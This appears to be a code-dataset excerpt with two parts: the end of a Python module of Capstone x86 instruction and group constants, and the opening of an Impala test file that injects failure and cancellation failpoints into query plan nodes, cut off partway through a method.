X86_INS_POPF = 562
X86_INS_POPFD = 563
X86_INS_POPFQ = 564
X86_INS_PREFETCH = 565
X86_INS_PREFETCHNTA = 566
X86_INS_PREFETCHT0 = 567
X86_INS_PREFETCHT1 = 568
X86_INS_PREFETCHT2 = 569
X86_INS_PREFETCHW = 570
X86_INS_PSHUFD = 571
X86_INS_PSHUFHW = 572
X86_INS_PSHUFLW = 573
X86_INS_PSLLDQ = 574
X86_INS_PSRLDQ = 575
X86_INS_PSWAPD = 576
X86_INS_PTEST = 577
X86_INS_PUNPCKHQDQ = 578
X86_INS_PUNPCKLQDQ = 579
X86_INS_PUSH = 580
X86_INS_PUSHAW = 581
X86_INS_PUSHAL = 582
X86_INS_PUSHF = 583
X86_INS_PUSHFD = 584
X86_INS_PUSHFQ = 585
X86_INS_RCL = 586
X86_INS_RCPPS = 587
X86_INS_RCPSS = 588
X86_INS_RCR = 589
X86_INS_RDFSBASE = 590
X86_INS_RDGSBASE = 591
X86_INS_RDMSR = 592
X86_INS_RDPMC = 593
X86_INS_RDRAND = 594
X86_INS_RDSEED = 595
X86_INS_RDTSC = 596
X86_INS_RDTSCP = 597
X86_INS_ROL = 598
X86_INS_ROR = 599
X86_INS_RORX = 600
X86_INS_ROUNDPD = 601
X86_INS_ROUNDPS = 602
X86_INS_ROUNDSD = 603
X86_INS_ROUNDSS = 604
X86_INS_RSM = 605
X86_INS_RSQRTPS = 606
X86_INS_RSQRTSS = 607
X86_INS_SAHF = 608
X86_INS_SAL = 609
X86_INS_SALC = 610
X86_INS_SAR = 611
X86_INS_SARX = 612
X86_INS_SBB = 613
X86_INS_SCASB = 614
X86_INS_SCASD = 615
X86_INS_SCASQ = 616
X86_INS_SCASW = 617
X86_INS_SETAE = 618
X86_INS_SETA = 619
X86_INS_SETBE = 620
X86_INS_SETB = 621
X86_INS_SETE = 622
X86_INS_SETGE = 623
X86_INS_SETG = 624
X86_INS_SETLE = 625
X86_INS_SETL = 626
X86_INS_SETNE = 627
X86_INS_SETNO = 628
X86_INS_SETNP = 629
X86_INS_SETNS = 630
X86_INS_SETO = 631
X86_INS_SETP = 632
X86_INS_SETS = 633
X86_INS_SFENCE = 634
X86_INS_SGDT = 635
X86_INS_SHA1MSG1 = 636
X86_INS_SHA1MSG2 = 637
X86_INS_SHA1NEXTE = 638
X86_INS_SHA1RNDS4 = 639
X86_INS_SHA256MSG1 = 640
X86_INS_SHA256MSG2 = 641
X86_INS_SHA256RNDS2 = 642
X86_INS_SHL = 643
X86_INS_SHLD = 644
X86_INS_SHLX = 645
X86_INS_SHR = 646
X86_INS_SHRD = 647
X86_INS_SHRX = 648
X86_INS_SHUFPD = 649
X86_INS_SHUFPS = 650
X86_INS_SIDT = 651
X86_INS_FSIN = 652
X86_INS_SKINIT = 653
X86_INS_SLDT = 654
X86_INS_SMSW = 655
X86_INS_SQRTPD = 656
X86_INS_SQRTPS = 657
X86_INS_SQRTSD = 658
X86_INS_SQRTSS = 659
X86_INS_FSQRT = 660
X86_INS_STAC = 661
X86_INS_STC = 662
X86_INS_STD = 663
X86_INS_STGI = 664
X86_INS_STI = 665
X86_INS_STMXCSR = 666
X86_INS_STOSB = 667
X86_INS_STOSD = 668
X86_INS_STOSQ = 669
X86_INS_STOSW = 670
X86_INS_STR = 671
X86_INS_FST = 672
X86_INS_FSTP = 673
X86_INS_FSTPNCE = 674
X86_INS_SUBPD = 675
X86_INS_SUBPS = 676
X86_INS_FSUBR = 677
X86_INS_FISUBR = 678
X86_INS_FSUBRP = 679
X86_INS_SUBSD = 680
X86_INS_SUBSS = 681
X86_INS_FSUB = 682
X86_INS_FISUB = 683
X86_INS_FSUBP = 684
X86_INS_SWAPGS = 685
X86_INS_SYSCALL = 686
X86_INS_SYSENTER = 687
X86_INS_SYSEXIT = 688
X86_INS_SYSRET = 689
X86_INS_T1MSKC = 690
X86_INS_TEST = 691
X86_INS_UD2 = 692
X86_INS_FTST = 693
X86_INS_TZCNT = 694
X86_INS_TZMSK = 695
X86_INS_FUCOMPI = 696
X86_INS_FUCOMI = 697
X86_INS_FUCOMPP = 698
X86_INS_FUCOMP = 699
X86_INS_FUCOM = 700
X86_INS_UD2B = 701
X86_INS_UNPCKHPD = 702
X86_INS_UNPCKHPS = 703
X86_INS_UNPCKLPD = 704
X86_INS_UNPCKLPS = 705
X86_INS_VADDPD = 706
X86_INS_VADDPS = 707
X86_INS_VADDSD = 708
X86_INS_VADDSS = 709
X86_INS_VADDSUBPD = 710
X86_INS_VADDSUBPS = 711
X86_INS_VAESDECLAST = 712
X86_INS_VAESDEC = 713
X86_INS_VAESENCLAST = 714
X86_INS_VAESENC = 715
X86_INS_VAESIMC = 716
X86_INS_VAESKEYGENASSIST = 717
X86_INS_VALIGND = 718
X86_INS_VALIGNQ = 719
X86_INS_VANDNPD = 720
X86_INS_VANDNPS = 721
X86_INS_VANDPD = 722
X86_INS_VANDPS = 723
X86_INS_VBLENDMPD = 724
X86_INS_VBLENDMPS = 725
X86_INS_VBLENDPD = 726
X86_INS_VBLENDPS = 727
X86_INS_VBLENDVPD = 728
X86_INS_VBLENDVPS = 729
X86_INS_VBROADCASTF128 = 730
X86_INS_VBROADCASTI128 = 731
X86_INS_VBROADCASTI32X4 = 732
X86_INS_VBROADCASTI64X4 = 733
X86_INS_VBROADCASTSD = 734
X86_INS_VBROADCASTSS = 735
X86_INS_VCMPPD = 736
X86_INS_VCMPPS = 737
X86_INS_VCMPSD = 738
X86_INS_VCMPSS = 739
X86_INS_VCVTDQ2PD = 740
X86_INS_VCVTDQ2PS = 741
X86_INS_VCVTPD2DQX = 742
X86_INS_VCVTPD2DQ = 743
X86_INS_VCVTPD2PSX = 744
X86_INS_VCVTPD2PS = 745
X86_INS_VCVTPD2UDQ = 746
X86_INS_VCVTPH2PS = 747
X86_INS_VCVTPS2DQ = 748
X86_INS_VCVTPS2PD = 749
X86_INS_VCVTPS2PH = 750
X86_INS_VCVTPS2UDQ = 751
X86_INS_VCVTSD2SI = 752
X86_INS_VCVTSD2USI = 753
X86_INS_VCVTSS2SI = 754
X86_INS_VCVTSS2USI = 755
X86_INS_VCVTTPD2DQX = 756
X86_INS_VCVTTPD2DQ = 757
X86_INS_VCVTTPD2UDQ = 758
X86_INS_VCVTTPS2DQ = 759
X86_INS_VCVTTPS2UDQ = 760
X86_INS_VCVTUDQ2PD = 761
X86_INS_VCVTUDQ2PS = 762
X86_INS_VDIVPD = 763
X86_INS_VDIVPS = 764
X86_INS_VDIVSD = 765
X86_INS_VDIVSS = 766
X86_INS_VDPPD = 767
X86_INS_VDPPS = 768
X86_INS_VERR = 769
X86_INS_VERW = 770
X86_INS_VEXTRACTF128 = 771
X86_INS_VEXTRACTF32X4 = 772
X86_INS_VEXTRACTF64X4 = 773
X86_INS_VEXTRACTI128 = 774
X86_INS_VEXTRACTI32X4 = 775
X86_INS_VEXTRACTI64X4 = 776
X86_INS_VEXTRACTPS = 777
X86_INS_VFMADD132PD = 778
X86_INS_VFMADD132PS = 779
X86_INS_VFMADD213PD = 780
X86_INS_VFMADD213PS = 781
X86_INS_VFMADDPD = 782
X86_INS_VFMADD231PD = 783
X86_INS_VFMADDPS = 784
X86_INS_VFMADD231PS = 785
X86_INS_VFMADDSD = 786
X86_INS_VFMADD213SD = 787
X86_INS_VFMADD132SD = 788
X86_INS_VFMADD231SD = 789
X86_INS_VFMADDSS = 790
X86_INS_VFMADD213SS = 791
X86_INS_VFMADD132SS = 792
X86_INS_VFMADD231SS = 793
X86_INS_VFMADDSUB132PD = 794
X86_INS_VFMADDSUB132PS = 795
X86_INS_VFMADDSUB213PD = 796
X86_INS_VFMADDSUB213PS = 797
X86_INS_VFMADDSUBPD = 798
X86_INS_VFMADDSUB231PD = 799
X86_INS_VFMADDSUBPS = 800
X86_INS_VFMADDSUB231PS = 801
X86_INS_VFMSUB132PD = 802
X86_INS_VFMSUB132PS = 803
X86_INS_VFMSUB213PD = 804
X86_INS_VFMSUB213PS = 805
X86_INS_VFMSUBADD132PD = 806
X86_INS_VFMSUBADD132PS = 807
X86_INS_VFMSUBADD213PD = 808
X86_INS_VFMSUBADD213PS = 809
X86_INS_VFMSUBADDPD = 810
X86_INS_VFMSUBADD231PD = 811
X86_INS_VFMSUBADDPS = 812
X86_INS_VFMSUBADD231PS = 813
X86_INS_VFMSUBPD = 814
X86_INS_VFMSUB231PD = 815
X86_INS_VFMSUBPS = 816
X86_INS_VFMSUB231PS = 817
X86_INS_VFMSUBSD = 818
X86_INS_VFMSUB213SD = 819
X86_INS_VFMSUB132SD = 820
X86_INS_VFMSUB231SD = 821
X86_INS_VFMSUBSS = 822
X86_INS_VFMSUB213SS = 823
X86_INS_VFMSUB132SS = 824
X86_INS_VFMSUB231SS = 825
X86_INS_VFNMADD132PD = 826
X86_INS_VFNMADD132PS = 827
X86_INS_VFNMADD213PD = 828
X86_INS_VFNMADD213PS = 829
X86_INS_VFNMADDPD = 830
X86_INS_VFNMADD231PD = 831
X86_INS_VFNMADDPS = 832
X86_INS_VFNMADD231PS = 833
X86_INS_VFNMADDSD = 834
X86_INS_VFNMADD213SD = 835
X86_INS_VFNMADD132SD = 836
X86_INS_VFNMADD231SD = 837
X86_INS_VFNMADDSS = 838
X86_INS_VFNMADD213SS = 839
X86_INS_VFNMADD132SS = 840
X86_INS_VFNMADD231SS = 841
X86_INS_VFNMSUB132PD = 842
X86_INS_VFNMSUB132PS = 843
X86_INS_VFNMSUB213PD = 844
X86_INS_VFNMSUB213PS = 845
X86_INS_VFNMSUBPD = 846
X86_INS_VFNMSUB231PD = 847
X86_INS_VFNMSUBPS = 848
X86_INS_VFNMSUB231PS = 849
X86_INS_VFNMSUBSD = 850
X86_INS_VFNMSUB213SD = 851
X86_INS_VFNMSUB132SD = 852
X86_INS_VFNMSUB231SD = 853
X86_INS_VFNMSUBSS = 854
X86_INS_VFNMSUB213SS = 855
X86_INS_VFNMSUB132SS = 856
X86_INS_VFNMSUB231SS = 857
X86_INS_VFRCZPD = 858
X86_INS_VFRCZPS = 859
X86_INS_VFRCZSD = 860
X86_INS_VFRCZSS = 861
X86_INS_VORPD = 862
X86_INS_VORPS = 863
X86_INS_VXORPD = 864
X86_INS_VXORPS = 865
X86_INS_VGATHERDPD = 866
X86_INS_VGATHERDPS = 867
X86_INS_VGATHERPF0DPD = 868
X86_INS_VGATHERPF0DPS = 869
X86_INS_VGATHERPF0QPD = 870
X86_INS_VGATHERPF0QPS = 871
X86_INS_VGATHERPF1DPD = 872
X86_INS_VGATHERPF1DPS = 873
X86_INS_VGATHERPF1QPD = 874
X86_INS_VGATHERPF1QPS = 875
X86_INS_VGATHERQPD = 876
X86_INS_VGATHERQPS = 877
X86_INS_VHADDPD = 878
X86_INS_VHADDPS = 879
X86_INS_VHSUBPD = 880
X86_INS_VHSUBPS = 881
X86_INS_VINSERTF128 = 882
X86_INS_VINSERTF32X4 = 883
X86_INS_VINSERTF64X4 = 884
X86_INS_VINSERTI128 = 885
X86_INS_VINSERTI32X4 = 886
X86_INS_VINSERTI64X4 = 887
X86_INS_VINSERTPS = 888
X86_INS_VLDDQU = 889
X86_INS_VLDMXCSR = 890
X86_INS_VMASKMOVDQU = 891
X86_INS_VMASKMOVPD = 892
X86_INS_VMASKMOVPS = 893
X86_INS_VMAXPD = 894
X86_INS_VMAXPS = 895
X86_INS_VMAXSD = 896
X86_INS_VMAXSS = 897
X86_INS_VMCALL = 898
X86_INS_VMCLEAR = 899
X86_INS_VMFUNC = 900
X86_INS_VMINPD = 901
X86_INS_VMINPS = 902
X86_INS_VMINSD = 903
X86_INS_VMINSS = 904
X86_INS_VMLAUNCH = 905
X86_INS_VMLOAD = 906
X86_INS_VMMCALL = 907
X86_INS_VMOVQ = 908
X86_INS_VMOVDDUP = 909
X86_INS_VMOVD = 910
X86_INS_VMOVDQA32 = 911
X86_INS_VMOVDQA64 = 912
X86_INS_VMOVDQA = 913
X86_INS_VMOVDQU16 = 914
X86_INS_VMOVDQU32 = 915
X86_INS_VMOVDQU64 = 916
X86_INS_VMOVDQU8 = 917
X86_INS_VMOVDQU = 918
X86_INS_VMOVHLPS = 919
X86_INS_VMOVHPD = 920
X86_INS_VMOVHPS = 921
X86_INS_VMOVLHPS = 922
X86_INS_VMOVLPD = 923
X86_INS_VMOVLPS = 924
X86_INS_VMOVMSKPD = 925
X86_INS_VMOVMSKPS = 926
X86_INS_VMOVNTDQA = 927
X86_INS_VMOVNTDQ = 928
X86_INS_VMOVNTPD = 929
X86_INS_VMOVNTPS = 930
X86_INS_VMOVSD = 931
X86_INS_VMOVSHDUP = 932
X86_INS_VMOVSLDUP = 933
X86_INS_VMOVSS = 934
X86_INS_VMOVUPD = 935
X86_INS_VMOVUPS = 936
X86_INS_VMPSADBW = 937
X86_INS_VMPTRLD = 938
X86_INS_VMPTRST = 939
X86_INS_VMREAD = 940
X86_INS_VMRESUME = 941
X86_INS_VMRUN = 942
X86_INS_VMSAVE = 943
X86_INS_VMULPD = 944
X86_INS_VMULPS = 945
X86_INS_VMULSD = 946
X86_INS_VMULSS = 947
X86_INS_VMWRITE = 948
X86_INS_VMXOFF = 949
X86_INS_VMXON = 950
X86_INS_VPABSB = 951
X86_INS_VPABSD = 952
X86_INS_VPABSQ = 953
X86_INS_VPABSW = 954
X86_INS_VPACKSSDW = 955
X86_INS_VPACKSSWB = 956
X86_INS_VPACKUSDW = 957
X86_INS_VPACKUSWB = 958
X86_INS_VPADDB = 959
X86_INS_VPADDD = 960
X86_INS_VPADDQ = 961
X86_INS_VPADDSB = 962
X86_INS_VPADDSW = 963
X86_INS_VPADDUSB = 964
X86_INS_VPADDUSW = 965
X86_INS_VPADDW = 966
X86_INS_VPALIGNR = 967
X86_INS_VPANDD = 968
X86_INS_VPANDND = 969
X86_INS_VPANDNQ = 970
X86_INS_VPANDN = 971
X86_INS_VPANDQ = 972
X86_INS_VPAND = 973
X86_INS_VPAVGB = 974
X86_INS_VPAVGW = 975
X86_INS_VPBLENDD = 976
X86_INS_VPBLENDMD = 977
X86_INS_VPBLENDMQ = 978
X86_INS_VPBLENDVB = 979
X86_INS_VPBLENDW = 980
X86_INS_VPBROADCASTB = 981
X86_INS_VPBROADCASTD = 982
X86_INS_VPBROADCASTMB2Q = 983
X86_INS_VPBROADCASTMW2D = 984
X86_INS_VPBROADCASTQ = 985
X86_INS_VPBROADCASTW = 986
X86_INS_VPCLMULQDQ = 987
X86_INS_VPCMOV = 988
X86_INS_VPCMP = 989
X86_INS_VPCMPD = 990
X86_INS_VPCMPEQB = 991
X86_INS_VPCMPEQD = 992
X86_INS_VPCMPEQQ = 993
X86_INS_VPCMPEQW = 994
X86_INS_VPCMPESTRI = 995
X86_INS_VPCMPESTRM = 996
X86_INS_VPCMPGTB = 997
X86_INS_VPCMPGTD = 998
X86_INS_VPCMPGTQ = 999
X86_INS_VPCMPGTW = 1000
X86_INS_VPCMPISTRI = 1001
X86_INS_VPCMPISTRM = 1002
X86_INS_VPCMPQ = 1003
X86_INS_VPCMPUD = 1004
X86_INS_VPCMPUQ = 1005
X86_INS_VPCOMB = 1006
X86_INS_VPCOMD = 1007
X86_INS_VPCOMQ = 1008
X86_INS_VPCOMUB = 1009
X86_INS_VPCOMUD = 1010
X86_INS_VPCOMUQ = 1011
X86_INS_VPCOMUW = 1012
X86_INS_VPCOMW = 1013
X86_INS_VPCONFLICTD = 1014
X86_INS_VPCONFLICTQ = 1015
X86_INS_VPERM2F128 = 1016
X86_INS_VPERM2I128 = 1017
X86_INS_VPERMD = 1018
X86_INS_VPERMI2D = 1019
X86_INS_VPERMI2PD = 1020
X86_INS_VPERMI2PS = 1021
X86_INS_VPERMI2Q = 1022
X86_INS_VPERMIL2PD = 1023
X86_INS_VPERMIL2PS = 1024
X86_INS_VPERMILPD = 1025
X86_INS_VPERMILPS = 1026
X86_INS_VPERMPD = 1027
X86_INS_VPERMPS = 1028
X86_INS_VPERMQ = 1029
X86_INS_VPERMT2D = 1030
X86_INS_VPERMT2PD = 1031
X86_INS_VPERMT2PS = 1032
X86_INS_VPERMT2Q = 1033
X86_INS_VPEXTRB = 1034
X86_INS_VPEXTRD = 1035
X86_INS_VPEXTRQ = 1036
X86_INS_VPEXTRW = 1037
X86_INS_VPGATHERDD = 1038
X86_INS_VPGATHERDQ = 1039
X86_INS_VPGATHERQD = 1040
X86_INS_VPGATHERQQ = 1041
X86_INS_VPHADDBD = 1042
X86_INS_VPHADDBQ = 1043
X86_INS_VPHADDBW = 1044
X86_INS_VPHADDDQ = 1045
X86_INS_VPHADDD = 1046
X86_INS_VPHADDSW = 1047
X86_INS_VPHADDUBD = 1048
X86_INS_VPHADDUBQ = 1049
X86_INS_VPHADDUBW = 1050
X86_INS_VPHADDUDQ = 1051
X86_INS_VPHADDUWD = 1052
X86_INS_VPHADDUWQ = 1053
X86_INS_VPHADDWD = 1054
X86_INS_VPHADDWQ = 1055
X86_INS_VPHADDW = 1056
X86_INS_VPHMINPOSUW = 1057
X86_INS_VPHSUBBW = 1058
X86_INS_VPHSUBDQ = 1059
X86_INS_VPHSUBD = 1060
X86_INS_VPHSUBSW = 1061
X86_INS_VPHSUBWD = 1062
X86_INS_VPHSUBW = 1063
X86_INS_VPINSRB = 1064
X86_INS_VPINSRD = 1065
X86_INS_VPINSRQ = 1066
X86_INS_VPINSRW = 1067
X86_INS_VPLZCNTD = 1068
X86_INS_VPLZCNTQ = 1069
X86_INS_VPMACSDD = 1070
X86_INS_VPMACSDQH = 1071
X86_INS_VPMACSDQL = 1072
X86_INS_VPMACSSDD = 1073
X86_INS_VPMACSSDQH = 1074
X86_INS_VPMACSSDQL = 1075
X86_INS_VPMACSSWD = 1076
X86_INS_VPMACSSWW = 1077
X86_INS_VPMACSWD = 1078
X86_INS_VPMACSWW = 1079
X86_INS_VPMADCSSWD = 1080
X86_INS_VPMADCSWD = 1081
X86_INS_VPMADDUBSW = 1082
X86_INS_VPMADDWD = 1083
X86_INS_VPMASKMOVD = 1084
X86_INS_VPMASKMOVQ = 1085
X86_INS_VPMAXSB = 1086
X86_INS_VPMAXSD = 1087
X86_INS_VPMAXSQ = 1088
X86_INS_VPMAXSW = 1089
X86_INS_VPMAXUB = 1090
X86_INS_VPMAXUD = 1091
X86_INS_VPMAXUQ = 1092
X86_INS_VPMAXUW = 1093
X86_INS_VPMINSB = 1094
X86_INS_VPMINSD = 1095
X86_INS_VPMINSQ = 1096
X86_INS_VPMINSW = 1097
X86_INS_VPMINUB = 1098
X86_INS_VPMINUD = 1099
X86_INS_VPMINUQ = 1100
X86_INS_VPMINUW = 1101
X86_INS_VPMOVDB = 1102
X86_INS_VPMOVDW = 1103
X86_INS_VPMOVMSKB = 1104
X86_INS_VPMOVQB = 1105
X86_INS_VPMOVQD = 1106
X86_INS_VPMOVQW = 1107
X86_INS_VPMOVSDB = 1108
X86_INS_VPMOVSDW = 1109
X86_INS_VPMOVSQB = 1110
X86_INS_VPMOVSQD = 1111
X86_INS_VPMOVSQW = 1112
X86_INS_VPMOVSXBD = 1113
X86_INS_VPMOVSXBQ = 1114
X86_INS_VPMOVSXBW = 1115
X86_INS_VPMOVSXDQ = 1116
X86_INS_VPMOVSXWD = 1117
X86_INS_VPMOVSXWQ = 1118
X86_INS_VPMOVUSDB = 1119
X86_INS_VPMOVUSDW = 1120
X86_INS_VPMOVUSQB = 1121
X86_INS_VPMOVUSQD = 1122
X86_INS_VPMOVUSQW = 1123
X86_INS_VPMOVZXBD = 1124
X86_INS_VPMOVZXBQ = 1125
X86_INS_VPMOVZXBW = 1126
X86_INS_VPMOVZXDQ = 1127
X86_INS_VPMOVZXWD = 1128
X86_INS_VPMOVZXWQ = 1129
X86_INS_VPMULDQ = 1130
X86_INS_VPMULHRSW = 1131
X86_INS_VPMULHUW = 1132
X86_INS_VPMULHW = 1133
X86_INS_VPMULLD = 1134
X86_INS_VPMULLW = 1135
X86_INS_VPMULUDQ = 1136
X86_INS_VPORD = 1137
X86_INS_VPORQ = 1138
X86_INS_VPOR = 1139
X86_INS_VPPERM = 1140
X86_INS_VPROTB = 1141
X86_INS_VPROTD = 1142
X86_INS_VPROTQ = 1143
X86_INS_VPROTW = 1144
X86_INS_VPSADBW = 1145
X86_INS_VPSCATTERDD = 1146
X86_INS_VPSCATTERDQ = 1147
X86_INS_VPSCATTERQD = 1148
X86_INS_VPSCATTERQQ = 1149
X86_INS_VPSHAB = 1150
X86_INS_VPSHAD = 1151
X86_INS_VPSHAQ = 1152
X86_INS_VPSHAW = 1153
X86_INS_VPSHLB = 1154
X86_INS_VPSHLD = 1155
X86_INS_VPSHLQ = 1156
X86_INS_VPSHLW = 1157
X86_INS_VPSHUFB = 1158
X86_INS_VPSHUFD = 1159
X86_INS_VPSHUFHW = 1160
X86_INS_VPSHUFLW = 1161
X86_INS_VPSIGNB = 1162
X86_INS_VPSIGND = 1163
X86_INS_VPSIGNW = 1164
X86_INS_VPSLLDQ = 1165
X86_INS_VPSLLD = 1166
X86_INS_VPSLLQ = 1167
X86_INS_VPSLLVD = 1168
X86_INS_VPSLLVQ = 1169
X86_INS_VPSLLW = 1170
X86_INS_VPSRAD = 1171
X86_INS_VPSRAQ = 1172
X86_INS_VPSRAVD = 1173
X86_INS_VPSRAVQ = 1174
X86_INS_VPSRAW = 1175
X86_INS_VPSRLDQ = 1176
X86_INS_VPSRLD = 1177
X86_INS_VPSRLQ = 1178
X86_INS_VPSRLVD = 1179
X86_INS_VPSRLVQ = 1180
X86_INS_VPSRLW = 1181
X86_INS_VPSUBB = 1182
X86_INS_VPSUBD = 1183
X86_INS_VPSUBQ = 1184
X86_INS_VPSUBSB = 1185
X86_INS_VPSUBSW = 1186
X86_INS_VPSUBUSB = 1187
X86_INS_VPSUBUSW = 1188
X86_INS_VPSUBW = 1189
X86_INS_VPTESTMD = 1190
X86_INS_VPTESTMQ = 1191
X86_INS_VPTESTNMD = 1192
X86_INS_VPTESTNMQ = 1193
X86_INS_VPTEST = 1194
X86_INS_VPUNPCKHBW = 1195
X86_INS_VPUNPCKHDQ = 1196
X86_INS_VPUNPCKHQDQ = 1197
X86_INS_VPUNPCKHWD = 1198
X86_INS_VPUNPCKLBW = 1199
X86_INS_VPUNPCKLDQ = 1200
X86_INS_VPUNPCKLQDQ = 1201
X86_INS_VPUNPCKLWD = 1202
X86_INS_VPXORD = 1203
X86_INS_VPXORQ = 1204
X86_INS_VPXOR = 1205
X86_INS_VRCP14PD = 1206
X86_INS_VRCP14PS = 1207
X86_INS_VRCP14SD = 1208
X86_INS_VRCP14SS = 1209
X86_INS_VRCP28PD = 1210
X86_INS_VRCP28PS = 1211
X86_INS_VRCP28SD = 1212
X86_INS_VRCP28SS = 1213
X86_INS_VRCPPS = 1214
X86_INS_VRCPSS = 1215
X86_INS_VRNDSCALEPD = 1216
X86_INS_VRNDSCALEPS = 1217
X86_INS_VRNDSCALESD = 1218
X86_INS_VRNDSCALESS = 1219
X86_INS_VROUNDPD = 1220
X86_INS_VROUNDPS = 1221
X86_INS_VROUNDSD = 1222
X86_INS_VROUNDSS = 1223
X86_INS_VRSQRT14PD = 1224
X86_INS_VRSQRT14PS = 1225
X86_INS_VRSQRT14SD = 1226
X86_INS_VRSQRT14SS = 1227
X86_INS_VRSQRT28PD = 1228
X86_INS_VRSQRT28PS = 1229
X86_INS_VRSQRT28SD = 1230
X86_INS_VRSQRT28SS = 1231
X86_INS_VRSQRTPS = 1232
X86_INS_VRSQRTSS = 1233
X86_INS_VSCATTERDPD = 1234
X86_INS_VSCATTERDPS = 1235
X86_INS_VSCATTERPF0DPD = 1236
X86_INS_VSCATTERPF0DPS = 1237
X86_INS_VSCATTERPF0QPD = 1238
X86_INS_VSCATTERPF0QPS = 1239
X86_INS_VSCATTERPF1DPD = 1240
X86_INS_VSCATTERPF1DPS = 1241
X86_INS_VSCATTERPF1QPD = 1242
X86_INS_VSCATTERPF1QPS = 1243
X86_INS_VSCATTERQPD = 1244
X86_INS_VSCATTERQPS = 1245
X86_INS_VSHUFPD = 1246
X86_INS_VSHUFPS = 1247
X86_INS_VSQRTPD = 1248
X86_INS_VSQRTPS = 1249
X86_INS_VSQRTSD = 1250
X86_INS_VSQRTSS = 1251
X86_INS_VSTMXCSR = 1252
X86_INS_VSUBPD = 1253
X86_INS_VSUBPS = 1254
X86_INS_VSUBSD = 1255
X86_INS_VSUBSS = 1256
X86_INS_VTESTPD = 1257
X86_INS_VTESTPS = 1258
X86_INS_VUNPCKHPD = 1259
X86_INS_VUNPCKHPS = 1260
X86_INS_VUNPCKLPD = 1261
X86_INS_VUNPCKLPS = 1262
X86_INS_VZEROALL = 1263
X86_INS_VZEROUPPER = 1264
X86_INS_WAIT = 1265
X86_INS_WBINVD = 1266
X86_INS_WRFSBASE = 1267
X86_INS_WRGSBASE = 1268
X86_INS_WRMSR = 1269
X86_INS_XABORT = 1270
X86_INS_XACQUIRE = 1271
X86_INS_XBEGIN = 1272
X86_INS_XCHG = 1273
X86_INS_FXCH = 1274
X86_INS_XCRYPTCBC = 1275
X86_INS_XCRYPTCFB = 1276
X86_INS_XCRYPTCTR = 1277
X86_INS_XCRYPTECB = 1278
X86_INS_XCRYPTOFB = 1279
X86_INS_XEND = 1280
X86_INS_XGETBV = 1281
X86_INS_XLATB = 1282
X86_INS_XRELEASE = 1283
X86_INS_XRSTOR = 1284
X86_INS_XRSTOR64 = 1285
X86_INS_XSAVE = 1286
X86_INS_XSAVE64 = 1287
X86_INS_XSAVEOPT = 1288
X86_INS_XSAVEOPT64 = 1289
X86_INS_XSETBV = 1290
X86_INS_XSHA1 = 1291
X86_INS_XSHA256 = 1292
X86_INS_XSTORE = 1293
X86_INS_XTEST = 1294
X86_INS_ENDING = 1295
# Group of X86 instructions
X86_GRP_INVALID = 0
# Generic groups
X86_GRP_JUMP = 1
X86_GRP_CALL = 2
X86_GRP_RET = 3
X86_GRP_INT = 4
X86_GRP_IRET = 5
# Architecture-specific groups
X86_GRP_VM = 128
X86_GRP_3DNOW = 129
X86_GRP_AES = 130
X86_GRP_ADX = 131
X86_GRP_AVX = 132
X86_GRP_AVX2 = 133
X86_GRP_AVX512 = 134
X86_GRP_BMI = 135
X86_GRP_BMI2 = 136
X86_GRP_CMOV = 137
X86_GRP_F16C = 138
X86_GRP_FMA = 139
X86_GRP_FMA4 = 140
X86_GRP_FSGSBASE = 141
X86_GRP_HLE = 142
X86_GRP_MMX = 143
X86_GRP_MODE32 = 144
X86_GRP_MODE64 = 145
X86_GRP_RTM = 146
X86_GRP_SHA = 147
X86_GRP_SSE1 = 148
X86_GRP_SSE2 = 149
X86_GRP_SSE3 = 150
X86_GRP_SSE41 = 151
X86_GRP_SSE42 = 152
X86_GRP_SSE4A = 153
X86_GRP_SSSE3 = 154
X86_GRP_PCLMUL = 155
X86_GRP_XOP = 156
X86_GRP_CDI = 157
X86_GRP_ERI = 158
X86_GRP_TBM = 159
X86_GRP_16BITMODE = 160
X86_GRP_NOT64BITMODE = 161
X86_GRP_SGX = 162
X86_GRP_DQI = 163
X86_GRP_BWI = 164
X86_GRP_PFI = 165
X86_GRP_VLX = 166
X86_GRP_SMAP = 167
X86_GRP_NOVLX = 168
X86_GRP_ENDING = 169
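# Illustrative sketch (appended for documentation, not part of the generated
# constants): these values are compared against the fields capstone fills in
# when detail mode is enabled. The instruction bytes below decode to
# "lock xadd dword ptr [ebx], eax" and are an assumed example.
#
#   from capstone import Cs, CS_ARCH_X86, CS_MODE_32
#   md = Cs(CS_ARCH_X86, CS_MODE_32)
#   md.detail = True
#   for insn in md.disasm(b'\xf0\x0f\xc1\x03', 0x1000):
#       if X86_PREFIX_LOCK in insn.prefix:
#           print('%s carries a LOCK prefix' % insn.mnemonic)
#       for op in insn.operands:
#           if op.type == X86_OP_MEM:
#               print('memory operand, base register id %d' % op.mem.base)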
|
ibmsoe/ImpalaPPC
|
refs/heads/Impala2.6-main
|
tests/failure/test_failpoints.py
|
2
|
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
# Injects failures at specific locations in each of the plan nodes. Currently supports
# two types of failures - cancellation of the query and a failure test hook.
#
import os
import pytest
import re
from copy import copy
from collections import defaultdict
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.impala_test_suite import ImpalaTestSuite, ALL_NODES_ONLY, LOG
from tests.common.test_vector import TestDimension
from tests.common.test_dimensions import create_exec_option_dimension
from tests.common.skip import SkipIf, SkipIfS3, SkipIfIsilon, SkipIfLocal
from tests.util.test_file_parser import QueryTestSectionReader
from time import sleep
FAILPOINT_ACTION = ['FAIL', 'CANCEL']
FAILPOINT_LOCATION = ['PREPARE', 'PREPARE_SCANNER', 'OPEN', 'GETNEXT', 'CLOSE']
# The goal of this query is to use all of the node types.
# TODO: This query could be simplified a bit...
QUERY = """
select a.int_col, count(b.int_col) int_sum from functional_hbase.alltypesagg a
join
(select * from alltypes
where year=2009 and month=1 order by int_col limit 2500
union all
select * from alltypes
where year=2009 and month=2 limit 3000) b
on (a.int_col = b.int_col)
group by a.int_col
order by int_sum
"""
# TODO: Update to include INSERT when we support failpoints in the HDFS/Hbase sinks using
# a similar pattern as test_cancellation.py
QUERY_TYPE = ["SELECT"]
@SkipIf.skip_hbase # -skip_hbase argument specified
@SkipIfS3.hbase # S3: missing coverage: failures
@SkipIfIsilon.hbase # ISILON: missing coverage: failures.
@SkipIfLocal.hbase
class TestFailpoints(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def parse_plan_nodes_from_explain_output(cls, query, use_db="default"):
"""Parses the EXPLAIN <query> output and returns a map of node_name->list(node_id)"""
client = cls.create_impala_client()
client.execute("use %s" % use_db)
    explain_result = client.execute("explain " + query)
